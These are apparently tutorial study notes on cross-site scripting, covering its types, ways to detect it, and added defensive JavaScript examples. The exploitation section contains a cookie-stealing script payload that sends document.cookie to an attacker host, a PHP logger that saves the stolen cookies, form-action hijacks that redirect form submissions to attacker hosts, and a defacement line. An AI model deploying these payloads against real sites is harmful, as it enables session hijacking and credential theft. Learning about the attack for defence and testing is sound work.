Cross-site Scripting

Introduction

XSS happens when user-supplied input is written into the page output without sanitization on input and without encoding on output, so the browser treats the input as HTML or script.

Goals of XSS:

  1. Cookie stealing

  2. Complete control on browser

  3. Initiating an exploitation phase against browser plugins first and then the machine

  4. Keylogging

3 types:

  1. Reflected (Server side code is vulnerable)

  2. Stored

  3. DOM (Client side code is vulnerable)

Reflected XSS

Victims bring the payload in the HTTP request to the vulnerable website. Then the browser renders the payload in the victim's context.

Persistent XSS

Persistent XSS is able to deface a webpage.

This type of attack does not need the victims to click on any links. It happens when a victim browses a vulnerable page injected with persistent XSS code.

DOM-based XSS

Makes use of the HTML tree: client-side JavaScript reads attacker-controlled data (e.g. from the URL fragment) and writes it into the DOM through a sink such as innerHTML without sanitization, so the server never sees the payload.
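The source-to-sink path described above, as an added example that is not part of the original notes: the page is assumed to jump to a section named in the URL fragment (a hypothetical https://example.test/help#intro), so location.hash is the attacker-controlled source and innerHTML the dangerous sink. The hardened version validates the source against an allowlist and writes through textContent, which never parses markup.

```javascript
// Added example (not from the original notes). Hypothetical page that
// renders the section named in the URL fragment into #content.

// Vulnerable version: the fragment goes straight into innerHTML, so a
// fragment such as #<img src=x onerror=alert(1)> is parsed as HTML and
// the handler runs. No request ever reaches the server.
function renderSectionUnsafe(el, hash) {
  el.innerHTML = '<h2>' + decodeURIComponent(hash.slice(1)) + '</h2>';
}

// Hardened version, in two layers:
//  1. validate the source against an allowlist of section identifiers;
//  2. write with textContent, which the browser never parses as HTML.
const SECTION_ID = /^[a-z][a-z0-9-]{0,31}$/;

// Returns the section id when the fragment is a plain identifier, else null.
// A malformed percent-encoding (decodeURIComponent throws) is also rejected.
function sectionFromHash(hash) {
  let raw;
  try {
    raw = decodeURIComponent((hash || '').replace(/^#/, ''));
  } catch (e) {
    return null;
  }
  return SECTION_ID.test(raw) ? raw : null;
}

function renderSectionSafe(el, hash) {
  const id = sectionFromHash(hash);
  const h2 = el.ownerDocument.createElement('h2');
  h2.textContent = id === null ? 'Unknown section' : id; // text, not markup
  el.replaceChildren(h2);
  return id;
}

// Wire-up when loaded in a browser; skipped under Node so the functions
// above can be exercised on their own.
if (typeof document !== 'undefined') {
  renderSectionSafe(document.getElementById('content'), location.hash);
}
```

The allowlist is the important part: encoding alone would not help here because the value is used as an identifier, not as display text, and a validated identifier can later be used safely in other sinks as well (element ids, query parameters).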

Find XSS

Input could be:

  1. GET/POST variables

  2. COOKIE

  3. HTTP HEADERS

First, try to inject <plaintext> tag to see if the page will be broken after.

Then, check if we can inject script using a <script> tag, or by injecting a tag that carries a DOM event handler attribute (e.g. an <h1> with an onmouseover attribute).

When inspecting the source code, look for every point where the application outputs data that is totally or partially supplied by the user without sanitization, then trace each one back to the source where the data is first retrieved (request parameter, cookie, header, database field).
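A small helper for the probe step above, added here as an example that is not part of the original notes: given a response body, it reports whether the <plaintext> probe came back raw (output encoding missing), as HTML entities (encoding in place), with its tag characters stripped (input filtered), or not at all. The sample responses are constructed for the example.

```javascript
// Added example (not from the original notes): classify how a probe string
// is reflected in a response body, so "page broke" is distinguished from
// "output encoding is working".
const PROBE = '<plaintext>'; // same probe the notes suggest

function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Fold numeric entity forms of < and > into the named ones so an app that
// encodes as &#60; / &#x3c; is still recognised as encoding.
function normalizeEntities(body) {
  return body.replace(/&#(?:60|x3c);/gi, '&lt;').replace(/&#(?:62|x3e);/gi, '&gt;');
}

// Returns one of:
//   'raw'      probe present unencoded        -> likely vulnerable
//   'encoded'  present only as entities        -> output encoding in place
//   'stripped' tag characters removed          -> input filter, not encoding
//   'absent'   not reflected at all
function classifyReflection(body, probe = PROBE) {
  if (body.includes(probe)) return 'raw';
  if (normalizeEntities(body).includes(htmlEncode(probe))) return 'encoded';
  const bare = probe.replace(/[<>"'\/]/g, '');
  if (bare && body.includes(bare)) return 'stripped';
  return 'absent';
}

// Constructed sample responses, one per outcome.
const SAMPLE_RESPONSES = {
  vulnerable: '<p>Hello <plaintext>, welcome back</p>',
  encoded:    '<p>Hello &lt;plaintext&gt;, welcome back</p>',
  numeric:    '<p>Hello &#60;plaintext&#62;, welcome back</p>',
  filtered:   '<p>Hello plaintext, welcome back</p>',
  unrelated:  '<p>Hello guest</p>',
};

function classifyAll(responses = SAMPLE_RESPONSES) {
  return Object.fromEntries(
    Object.entries(responses).map(([name, body]) => [name, classifyReflection(body)])
  );
}
```

Only 'raw' means the tag reached the parser; 'stripped' is still worth noting in a report, because a blocklist filter is weaker than encoding and usually has gaps, but it is a different finding.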

XSS tricks

Simple:

<script>alert('xss')</script>

IMG tag onload:

<img src="xxx" onload="javascript:alert('xss')">
<img src="xxx" onload="alert('xss')">
<img src="xxx" onload="alert(String.fromCharCode(88,83,83))">

XSS Exploit

  1. Find injection point

  2. Read the cookie using JS

  3. Redirect the cookie to attacker server

  4. Retrieve and install the stolen cookie on browser

Example:

<script>
var i = new Image(); 
i.src="http://attacker.site/steal.php?q="%2bdocument.cookie;
</script>

Note: %2b is the URL-encoded form of +. The payload travels inside the request URL, where a literal + would be decoded as a space; after the server decodes it, the browser sees a plain +.

The steal.php could be:

<?php
// Append whatever arrived in the q parameter to a log file.
$fn = "log.txt";
$fh = fopen($fn, 'a');
$cookie = $_GET['q'];
fwrite($fh, $cookie . "\n");
fclose($fh);

We can also do some other thing, for example, change form action location:

document.forms[0].action="http://attacker.site/steal.php";

Web Defacement

  • Make use of Persistent XSS

  • Change the appearance of the web by manipulating the DOM

document.body.innerHTML="<h1>You Asshole!</h1>";

Phishing

  • By modifying the form action's destination

document.forms[0].action="https://hacker.site/thanks.php";

BeEF

XSS Evasion
